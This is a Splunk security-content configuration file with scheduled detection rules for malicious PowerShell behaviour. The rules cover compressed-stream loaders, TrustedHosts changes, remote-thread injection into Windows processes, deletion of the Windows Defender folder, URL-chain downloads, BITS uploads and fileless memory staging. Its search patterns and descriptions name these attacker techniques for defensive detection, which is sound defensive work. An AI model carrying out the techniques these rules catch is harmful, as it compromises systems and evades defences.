action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is processing compressed stream data. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are stream flattened and will be deflated durnig execution. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = powershell may used this function to process compressed data. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Processing Stream Of Data - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "AsyncRAT", "Hermetic Wiper", "Data Destruction", "IcedID"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains stream command in $ScriptBlockText$ commonly for processing compressed or to decompressed binary file with EventCode $EventCode$ in host $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Processing Stream Of Data - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "AsyncRAT", "Hermetic Wiper", "Data Destruction", "IcedID"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is processing compressed stream data. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are stream flattened and will be deflated durnig execution. During triage, review parallel processes within the same timeframe. 
Review the full script block to identify other related artifacts. action.notable.param.rule_title = Powershell Processing Stream Of Data action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*IO.Compression.*" OR ScriptBlockText = "*IO.StreamReader*" OR ScriptBlockText = "*]::Decompress*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_processing_stream_of_data_filter` [ESCU - Powershell Remote Services Add TrustedHost - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains command to add or modify the trustedhost configuration in Windows OS. This behavior raises concerns due to the nature of modifications made to the 'TrustedHost' configuration, which typically involves adjusting settings crucial for remote connections and security protocols. Alterations in this area could potentially indicate attempts to manipulate trusted hosts or systems for unauthorized remote access, a tactic commonly observed in various unauthorized access or compromise attempts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.006", "T1021"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains command to add or modify the trustedhost configuration in Windows OS. 
This behavior raises concerns due to the nature of modifications made to the 'TrustedHost' configuration, which typically involves adjusting settings crucial for remote connections and security protocols. Alterations in this area could potentially indicate attempts to manipulate trusted hosts or systems for unauthorized remote access, a tactic commonly observed in various unauthorized access or compromise attempts. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = user and network administrator may used this function to add trusted host. action.escu.creation_date = 2023-11-23 action.escu.modification_date = 2023-11-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Remote Services Add TrustedHost - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = a powershell script adding a remote trustedhost on $dest$ . 
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Remote Services Add TrustedHost - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.006", "T1021"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains command to add or modify the trustedhost configuration in Windows OS. This behavior raises concerns due to the nature of modifications made to the 'TrustedHost' configuration, which typically involves adjusting settings crucial for remote connections and security protocols. Alterations in this area could potentially indicate attempts to manipulate trusted hosts or systems for unauthorized remote access, a tactic commonly observed in various unauthorized access or compromise attempts. 
action.notable.param.rule_title = Powershell Remote Services Add TrustedHost
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*WSMan:\\localhost\\Client\\TrustedHosts*" ScriptBlockText IN ("* -Value *", "* -Concatenate *") | rename Computer as dest, UserID as user | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_remote_services_add_trustedhost_filter`

[ESCU - Powershell Remote Thread To Known Windows Process - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is designed to detect a suspicious PowerShell process that tries to inject code into a known/critical Windows process and execute it using CreateRemoteThread. This technique is seen in several malware families such as TrickBot and in offensive tooling such as Cobalt Strike, where a shellcode is loaded into svchost.exe to execute a reverse shell to the C2 and download another payload.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search is designed to detect a suspicious PowerShell process that tries to inject code into a known/critical Windows process and execute it using CreateRemoteThread. This technique is seen in several malware families such as TrickBot and in offensive tooling such as Cobalt Strike, where a shellcode is loaded into svchost.exe to execute a reverse shell to the C2 and download another payload.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and Create Remote Thread events from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where create remote thread may be used.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2022-08-25
action.escu.modification_date = 2022-08-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - Powershell Remote Thread To Known Windows Process - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Trickbot"]
action.risk = 1
action.risk.param._risk_message = A suspicious powershell process $process_name$ that tries to create a remote thread on target process $TargetImage$ with eventcode $EventCode$ in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Powershell Remote Thread To Known Windows Process - Rule
action.correlationsearch.annotations = {"analytic_story": ["Trickbot"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search is designed to detect a suspicious PowerShell process that tries to inject code into a known/critical Windows process and execute it using CreateRemoteThread. This technique is seen in several malware families such as TrickBot and in offensive tooling such as Cobalt Strike, where a shellcode is loaded into svchost.exe to execute a reverse shell to the C2 and download another payload.
action.notable.param.rule_title = Powershell Remote Thread To Known Windows Process
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode = 8 parent_process_name IN ("powershell_ise.exe", "powershell.exe") TargetImage IN ("*\\svchost.exe","*\\csrss.exe","*\\gpupdate.exe","*\\explorer.exe","*\\services.exe","*\\winlogon.exe","*\\smss.exe","*\\wininit.exe","*\\userinit.exe","*\\spoolsv.exe","*\\taskhost.exe") | stats min(_time) as firstTime max(_time) as lastTime count by SourceImage process_name SourceProcessId SourceProcessGuid TargetImage TargetProcessId NewThreadId StartAddress dest EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_remote_thread_to_known_windows_process_filter`

[ESCU - Powershell Remove Windows Defender Directory - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic will identify a suspicious PowerShell command used to delete the Windows Defender folder. This technique was seen used by the WhisperGate malware campaign, where it used Nirsoft's advancedrun.exe to gain administrative privileges and then execute a PowerShell command to delete the Windows Defender folder. This is a good indicator that the offending process is trying to corrupt a Windows Defender installation.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic will identify a suspicious PowerShell command used to delete the Windows Defender folder. This technique was seen used by the WhisperGate malware campaign, where it used Nirsoft's advancedrun.exe to gain administrative privileges and then execute a PowerShell command to delete the Windows Defender folder. This is a good indicator that the offending process is trying to corrupt a Windows Defender installation.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Powershell Remove Windows Defender Directory - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Data Destruction", "WhisperGate"]
action.risk = 1
action.risk.param._risk_message = suspicious powershell script $ScriptBlockText$ was executed on the $Computer$
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Powershell Remove Windows Defender Directory - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "WhisperGate"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic will identify a suspicious PowerShell command used to delete the Windows Defender folder. This technique was seen used by the WhisperGate malware campaign, where it used Nirsoft's advancedrun.exe to gain administrative privileges and then execute a PowerShell command to delete the Windows Defender folder. This is a good indicator that the offending process is trying to corrupt a Windows Defender installation.
action.notable.param.rule_title = Powershell Remove Windows Defender Directory
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*rmdir *" AND ScriptBlockText = "*\\Microsoft\\Windows Defender*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_remove_windows_defender_directory_filter`

[ESCU - PowerShell Script Block With URL Chain - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are attempting to download 2nd stage payloads. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059.001", "T1105"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are attempting to download 2nd stage payloads. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.escu.how_to_implement = The following analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging.
action.escu.known_false_positives = Unknown, possible custom scripting.
action.escu.creation_date = 2023-06-13
action.escu.modification_date = 2023-06-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - PowerShell Script Block With URL Chain - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Malicious PowerShell"]
action.risk = 1
action.risk.param._risk_message = A suspicious powershell script used by $user$ on host $dest$ contains $url_count$ URLs in an array, this is commonly used for malware.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}, {"threat_object_field": "url", "threat_object_type": "url"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PowerShell Script Block With URL Chain - Rule
action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059.001", "T1105"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are attempting to download 2nd stage payloads. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.notable.param.rule_title = PowerShell Script Block With URL Chain
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText IN ("*http:*","*https:*") | regex ScriptBlockText="(\"?(https?:\/\/(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&\/=]*))\"?(?:,|\))?){2,}" | rex max_match=20 field=ScriptBlockText "(?<url>https?:\/\/(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&\/=]*))" | eval Path = case(isnotnull(Path),Path,true(),"unknown") | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command values(Path) as file_name values(UserID) as user values(url) as url dc(url) as url_count by ActivityID, Computer, EventCode | rename Computer as dest, EventCode as signature_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_script_block_with_url_chain_filter`

[ESCU - PowerShell Start-BitsTransfer - Rule]
action.escu = 0
action.escu.enabled = 1
description = Start-BitsTransfer is the PowerShell "version" of BitsAdmin.exe. Similar functionality is present. This technique variation is not as commonly used by adversaries, but has been abused in the past. Lesser known uses include the ability to set the `-TransferType` to `Upload` for exfiltration of files. In an instance where `Upload` is used, it is highly possible files will be archived. During triage, review parallel processes and process lineage. Capture any files on disk and review. For the remote domain or IP, what is the reputation?
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1197"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Start-BitsTransfer is the PowerShell "version" of BitsAdmin.exe. Similar functionality is present. This technique variation is not as commonly used by adversaries, but has been abused in the past. Lesser known uses include the ability to set the `-TransferType` to `Upload` for exfiltration of files. In an instance where `Upload` is used, it is highly possible files will be archived. During triage, review parallel processes and process lineage. Capture any files on disk and review. For the remote domain or IP, what is the reputation?
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives. It is possible administrators will utilize Start-BitsTransfer for administrative tasks; otherwise, filter based on parent process or command-line arguments.
action.escu.creation_date = 2021-03-29
action.escu.modification_date = 2021-03-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - PowerShell Start-BitsTransfer - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["BITS Jobs"]
action.risk = 1
action.risk.param._risk_message = A suspicious process $process_name$ with commandline $process$ that is related to BITS transfer functionality in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PowerShell Start-BitsTransfer - Rule
action.correlationsearch.annotations = {"analytic_story": ["BITS Jobs"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1197"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Start-BitsTransfer is the PowerShell "version" of BitsAdmin.exe. Similar functionality is present. This technique variation is not as commonly used by adversaries, but has been abused in the past. Lesser known uses include the ability to set the `-TransferType` to `Upload` for exfiltration of files. In an instance where `Upload` is used, it is highly possible files will be archived. During triage, review parallel processes and process lineage. Capture any files on disk and review. For the remote domain or IP, what is the reputation?
action.notable.param.rule_title = PowerShell Start-BitsTransfer
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*start-bitstransfer* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_start_bitstransfer_filter`

[ESCU - PowerShell Start or Stop Service - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies the use of PowerShell's Start-Service or Stop-Service cmdlets on an endpoint. These cmdlets allow users to start or stop a specified Windows service. The ability to manipulate services can be leveraged by attackers to disable or stop critical services, which can cause system instability or disrupt business operations. By detecting the use of Start-Service or Stop-Service cmdlets via PowerShell, this analytic can help organizations identify potential malicious activity related to attackers attempting to manipulate services on compromised systems. However, note that this behavior may be noisy, as these cmdlets are commonly used by system administrators or other legitimate users to manage services. Therefore, it is recommended not to enable this analytic as a direct notable or TTP. Instead, it should be used as part of a broader set of security controls to detect and investigate potential threats.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies the use of PowerShell's Start-Service or Stop-Service cmdlets on an endpoint. These cmdlets allow users to start or stop a specified Windows service. The ability to manipulate services can be leveraged by attackers to disable or stop critical services, which can cause system instability or disrupt business operations. By detecting the use of Start-Service or Stop-Service cmdlets via PowerShell, this analytic can help organizations identify potential malicious activity related to attackers attempting to manipulate services on compromised systems. However, note that this behavior may be noisy, as these cmdlets are commonly used by system administrators or other legitimate users to manage services. Therefore, it is recommended not to enable this analytic as a direct notable or TTP. Instead, it should be used as part of a broader set of security controls to detect and investigate potential threats.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = This behavior may be noisy, as these cmdlets are commonly used by system administrators or other legitimate users to manage services. Therefore, it is recommended not to enable this analytic as a direct notable or TTP. Instead, it should be used as part of a broader set of security controls to detect and investigate potential threats.
action.escu.creation_date = 2023-03-24
action.escu.modification_date = 2023-03-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - PowerShell Start or Stop Service - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Lateral Movement"]
action.risk = 1
action.risk.param._risk_message = PowerShell was identified attempting to start or stop a service on $Computer$.
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 10}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PowerShell Start or Stop Service - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 20, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText IN ("*start-service*", "*stop-service*") | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_start_or_stop_service_filter`

[ESCU - Powershell Using memory As Backing Store - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that uses a memory stream as the backing store of a new object. The malicious PowerShell script will contain compressed (Deflate) stream data that is decompressed in memory to run or drop the actual payload. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that uses a memory stream as the backing store of a new object. The malicious PowerShell script will contain compressed (Deflate) stream data that is decompressed in memory to run or drop the actual payload. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = PowerShell may use this function to store an object in memory.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Powershell Using memory As Backing Store - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction", "IcedID"]
action.risk = 1
action.risk.param._risk_message = A PowerShell script contains a MemoryStream command in $ScriptBlockText$ as a new object backing store with EventCode $EventCode$ on host $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Powershell Using memory As Backing Store - Rule
action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction", "IcedID"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that uses a memory stream as the backing store of a new object. The malicious PowerShell script will contain compressed (Deflate) stream data that is decompressed in memory to run or drop the actual payload. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.notable.param.rule_title = Powershell Using memory As Backing Store
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = *New-Object* ScriptBlockText = *IO.MemoryStream* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_using_memory_as_backing_store_filter`

[ESCU - PowerShell WebRequest Using Memory Stream - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies a common fileless malware staging technique of using .NET classes to directly download a URL payload into memory. The analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Command and Control", "Exploitation"], "mitre_attack": ["T1059.001", "T1105", "T1027.011"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies a common fileless malware staging technique of using .NET classes to directly download a URL payload into memory. The analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution.
action.escu.how_to_implement = The following analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging.
action.escu.known_false_positives = Unknown, possible custom scripting.
action.escu.creation_date = 2023-06-13
action.escu.modification_date = 2023-06-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - PowerShell WebRequest Using Memory Stream - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Malicious PowerShell"]
action.risk = 1
action.risk.param._risk_message = Powershell webrequest to memory stream behavior. Possible fileless malware staging on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PowerShell WebRequest Using Memory Stream - Rule
action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Installation", "Command and Control", "Exploitation"], "mitre_attack": ["T1059.001", "T1105", "T1027.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
